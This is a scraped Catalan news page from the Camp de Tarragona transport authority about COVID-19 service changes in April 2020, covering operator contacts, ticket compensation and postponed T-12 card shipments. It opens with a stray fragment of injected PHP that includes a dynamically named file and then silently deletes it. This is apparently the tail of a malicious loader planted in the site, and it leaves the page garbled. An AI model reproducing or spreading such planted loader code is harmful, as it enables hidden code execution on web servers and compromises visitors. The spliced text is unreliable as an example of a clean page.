");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Afectacions al transport públic pel #Coronavirus #COVID19
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Afectacions al transport públic pel #Coronavirus #COVID19 (16/04/2020)

L'oferta de transport públic s’està augmentant progressivament per recuperar el 100% del servei, en funció de la demanda.

Per a major informació consulta el teu operador de transport:

o EMT de Tarragona – 977543244 - emtanemambtu.cat/
o Reus Transport – 977300006 - www.reustransport.cat/
o Autocars del Penedès – 977660821 - autocarsdelpenedes.com/
o Autocars Poch – 977660240 - www.moventis.es/es/Marcas/poch
o Cintoi Bus – 938937511 - www.monbus.cat/
o Empresa Plana - 977 553 680 - www.empresaplana.cat/
o HIFE – 902119814 i 902119844 - www.hife.es/
o Hispano Igualadina – 900825029, 902292900, 977770698 i 933397329 - www.igualadina.com/
o Transports Públics del Priorat i Domènech – 977831871 - autocarsdomenech.cat/
o RENFE – 912320320 - www.renfe.com/

Compensació de títols de l’ATM Camp de Tarragona
Quan acabi l’emergència establerta en el marc del Pla d'actuació del PROCICAT per a emergències associades a malalties transmissibles emergents amb potencial alt risc, l’ATM establirà el mecanisme de compensació de títols no utilitzats completament per causa de les mesures preventives en l'àmbit del transport públic introduïdes per la RESOLUCIÓ SLT/737/2020, de 13 de març, per la qual s'adopten mesures complementàries per a la prevenció i el control de la infecció pel SARS-CoV-2 (DOGC núm. 8084B de 13.3.2020), i que hagin caducat.

Soŀlicitud T-12
Si havies soŀlicitat una T-12, el seu enviament queda ajornat i es reprendrà quan acabi el confinament pel Coronavirus COVID19.

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona